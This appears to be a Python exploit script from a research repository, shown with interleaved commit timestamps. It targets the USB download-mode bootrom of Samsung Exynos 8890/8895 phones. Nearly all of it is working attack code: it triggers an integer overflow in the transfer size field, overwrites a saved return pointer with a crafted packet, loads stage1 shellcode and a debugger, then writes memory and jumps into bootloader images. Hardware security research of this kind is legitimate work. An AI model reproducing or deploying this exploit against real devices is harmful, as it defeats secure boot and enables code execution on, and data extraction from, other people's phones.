Samsung_S7/source/exploit/exploit.py

353 lines
14 KiB
Python
Raw Normal View History

2024-08-07 17:13:35 +00:00
import usb.util, usb.core
2024-08-02 13:51:35 +00:00
import struct, sys, usb1, libusb1, ctypes, usb, argparse
from keystone import *
from capstone import *
2024-08-02 17:53:33 +00:00
from ghidra_assistant.utils.utils import *
2024-08-05 12:51:04 +00:00
from ghidra_assistant.concrete_device import *
2024-08-05 17:37:13 +00:00
from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_debugger
from qiling.const import QL_ARCH
2024-08-02 13:51:35 +00:00
def p32(x):
return struct.pack("<I", x)
def p8(x):
return struct.pack("<B", x)
def p16(x):
return struct.pack("<H", x)
def p64(x):
return struct.pack("<Q", x)
2024-08-05 17:37:13 +00:00
logger = setup_logger("") #Leave empty to get root logger
logger.setLevel(logging.DEBUG)
2024-08-02 13:51:35 +00:00
BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
2024-08-07 17:13:35 +00:00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10) # 512, - 10 for ready (4), size (4), footer (2)
2024-08-02 13:51:35 +00:00
DL_BUFFER_START = 0x02021800
2024-08-07 17:13:35 +00:00
DL_BUFFER_SIZE = 0x4E800 #max allowed/usable size within the buffer, with end at 0x02070000
2024-08-02 13:51:35 +00:00
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
2024-08-07 17:13:35 +00:00
"8890": (0x02021800, 0x02020F08, 0x02070000), #0x206ffff on exynos 8890
2024-08-02 13:51:35 +00:00
"8895": (0x02021800, 0x02020F18, 0x02070000)
}
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
2024-08-05 12:51:04 +00:00
ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
2024-08-02 13:51:35 +00:00
class ExynosDevice():
def __init__(self, idVendor=0x04e8, idProduct=0x1234):
"""Init with vendor/product IDs"""
self.idVendor = idVendor
self.idProduct = idProduct
self.target = "8890" # TODO auto detect device
self.connect_device()
def connect_device(self):
2024-08-07 17:13:35 +00:00
"""Wait for proper connection to the device"""
2024-08-02 13:51:35 +00:00
self.context = usb1.USBContext()
while True:
self.handle = self.context.openByVendorIDAndProductID(
vendor_id=self.idVendor,
product_id=self.idProduct,
2024-08-07 17:13:35 +00:00
skip_on_error=False
2024-08-02 13:51:35 +00:00
)
if self.handle == None:
continue
break
2024-08-07 17:13:35 +00:00
print(f"Connected device! {self.idVendor} {self.idProduct}")
2024-08-02 13:51:35 +00:00
2024-08-05 12:51:04 +00:00
def write(self, data):
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
2024-08-05 12:51:04 +00:00
assert(res == 0), "Could not perform bulk transfer"
return res
2024-08-02 13:51:35 +00:00
def send_empty_transfer(self):
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
assert(res == 0)
2024-08-05 12:51:04 +00:00
return transferred.value
2024-08-02 13:51:35 +00:00
def test_bug_2(self):
2024-08-05 12:51:04 +00:00
'''
Interger overflow in last packet if reamining size is 1.
'''
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
pass
2024-08-07 17:13:35 +00:00
2024-08-02 13:51:35 +00:00
def test_bug(self):
# Start by sending a valid packet
# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
assert (len(payload) == BLOCK_SIZE)
2024-08-05 12:51:04 +00:00
res = self.write(payload, MAX_PAYLOAD_SIZE)
2024-08-02 13:51:35 +00:00
for i in range(200):
print(hex(self.send_empty_transfer()))
print('Bug probably available')
sys.exit(0)
def send_normal(self, payload):
2024-08-05 12:51:04 +00:00
'''
TODO not working
'''
2024-08-02 13:51:35 +00:00
# construct dl_data
payload = struct.pack("<II", 0, len(payload)) #+ (payload + b"\x00" * 2)
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0, "Error sending payload"
pass
def exploit(self, payload: bytes):
2024-08-05 12:51:04 +00:00
'''
2024-08-07 17:13:35 +00:00
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
2024-08-05 12:51:04 +00:00
'''
2024-08-02 13:51:35 +00:00
current_offset = TARGET_OFFSETS[self.target][0]
2024-08-07 17:13:35 +00:00
xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
2024-08-07 17:13:35 +00:00
size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 - header(8) + data(n) + footer(2)
#size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
2024-08-02 13:51:35 +00:00
max_payload_size = 0x100000000 - size_to_overflow
2024-08-07 17:13:35 +00:00
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) #
2024-08-02 13:51:35 +00:00
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug
bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload"
assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
cnt = 0
while True:
2024-08-07 17:13:35 +00:00
if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
2024-08-02 13:51:35 +00:00
break
self.send_empty_transfer()
current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
# Build ROP chain.
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
assert res == 0, "Error sending ROP chain"
2024-08-05 12:51:04 +00:00
def usb_write(self, data):
assert len(data) <= 0x200, "Data too big"
transferred = ctypes.c_int()
2024-08-05 17:37:13 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 300)
assert res == 0, f"Error sending data {res}"
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
2024-08-05 12:51:04 +00:00
return transferred.value
2024-08-02 17:53:33 +00:00
2024-08-05 12:51:04 +00:00
def usb_read(self, size):
transferred = ctypes.c_int()
buf = ctypes.c_buffer(b"", size)
2024-08-05 17:37:13 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
assert res == 0, f"Error receiving data {res}"
2024-08-05 12:51:04 +00:00
return buf.raw[:transferred.value]
2024-08-05 17:37:13 +00:00
def setup_concrete_device(self, concrete_device : ConcreteDevice):
#Setup architecture
concrete_device.arch = QL_ARCH.ARM64
concrete_device.ga_debugger_location = 0x2069000 # TODO, not used yet
concrete_device.ga_vbar_location = 0x206d000 + 0x1000
concrete_device.ga_storage_location = 0x206d000
concrete_device.ga_stack_location = 0x206b000
concrete_device.arch_dbg = GA_arm64_debugger(concrete_device.ga_vbar_location, concrete_device.ga_debugger_location, concrete_device.ga_storage_location)
concrete_device.arch_dbg.read = self.usb_read
concrete_device.arch_dbg.write = self.usb_write
#Overwrite all calls to make the concrete target function properly
concrete_device.copy_functions()
def setup_debugger(self):
'''
Setup the debugger as a concrete device
'''
self.cd = ConcreteDevice(None, False)
self.cd.dev = self.setup_concrete_device(self.cd)
self.cd.test_connection()
def dumb_interact(self):
'''
Room for playing around with the debugger
'''
self.cd.arch_dbg.state.auto_sync = False
self.cd.arch_dbg.state.print_ctx()
2024-08-06 22:20:30 +00:00
# Overwrite jump back
self.cd.memwrite_region(0x02020108, p32(0x2069000))
# self.cd.memwrite_region(0x020200e8, p32(0x2069000))
2024-08-05 17:37:13 +00:00
AUTH_BL1 = 0x00012848
def memdump_try():
dumped = b""
for block in range(0x2020000, 0x2200000, 0x200):
print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
def auth_bl1():
# Load the firmware
self.cd.arch_dbg.state.X0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
2024-08-06 22:20:30 +00:00
def jump_bl1():
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x02024010)
# self.cd.restore_stack_and_jump(0x02021810)
#000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
bl1 = open("../S7/bl1.bin", "rb").read()
self.cd.memwrite_region(0x02024000, bl1)
self.usb_write(b"FLSH")
# auth_bl1()
jump_bl1()
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
self.cd.arch_dbg.state.print_ctx()
def jump_bl31():
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x02021810)
bl31 = open("../S7/bl31.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl31)
jump_bl31()
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
self.cd.arch_dbg.state.print_ctx()
2024-08-05 17:37:13 +00:00
2024-08-06 22:20:30 +00:00
# memdump_try()
# auth_bl1()
2024-08-05 17:37:13 +00:00
self.cd.arch_dbg.state.print_ctx()
#authenticate it
pass
2024-08-02 13:51:35 +00:00
2024-08-05 12:51:04 +00:00
def run_boot_chain(self):
stage1 = open("stage1/stage1.bin", "rb").read()
self.exploit(stage1)
def run_debugger():
# TODO, hardcoded path
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
debugger += ((0x2000 - len(debugger)) * b"\x00")
assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
for block in range(0, len(debugger), 0x200):
self.usb_write(debugger[block:block+0x200])
2024-08-05 17:37:13 +00:00
# time.sleep(.5) # Wait a little bit
2024-08-05 12:51:04 +00:00
assert self.usb_read(0x200) == b"GiAs", "No response from debugger"
# Test basic functionality
self.usb_write(b"PING")
r = self.usb_read(0x200)
assert r == b"PONG", f"Invalid response from device: {r}"
run_debugger()
2024-08-05 17:37:13 +00:00
self.setup_debugger()
self.dumb_interact()
2024-08-05 12:51:04 +00:00
2024-08-02 13:51:35 +00:00
2024-08-05 12:51:04 +00:00
def usb_debug():
'''
Function to debug USB behavior
'''
2024-08-02 13:51:35 +00:00
2024-08-05 12:51:04 +00:00
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
2024-08-02 13:51:35 +00:00
assert len(shellcode) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
exynos = ExynosDevice()
exynos.exploit(shellcode)
transferred = ctypes.c_int()
# Send some data
count = 0
2024-08-02 13:51:35 +00:00
def send_data():
transferred.value = 0
p = p32(count) + b"\xaa" * (0x200 - 4)
2024-08-02 13:51:35 +00:00
res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
assert res == 0, "Error sending data"
def recv_data():
transferred.value = 0
buf = ctypes.c_buffer(b"", 0x200)
2024-08-02 17:53:33 +00:00
res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
2024-08-02 19:11:18 +00:00
assert res == 0, "Error receiving data"
hexdump(buf.raw)
2024-08-02 13:51:35 +00:00
pass
# Should have received some bytes
while True:
send_data()
recv_data()
count += 1
2024-08-07 17:13:35 +00:00
2024-08-02 13:51:35 +00:00
if __name__ == "__main__":
arg = argparse.ArgumentParser("Exynos exploit")
2024-08-05 12:51:04 +00:00
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
2024-08-07 17:13:35 +00:00
# Debug mode
2024-08-02 13:51:35 +00:00
args = arg.parse_args()
if args.debug:
usb_debug()
2024-08-05 12:51:04 +00:00
sys.exit(0)
2024-08-07 17:13:35 +00:00
2024-08-02 13:51:35 +00:00
exynos = ExynosDevice()
2024-08-05 12:51:04 +00:00
exynos.run_boot_chain()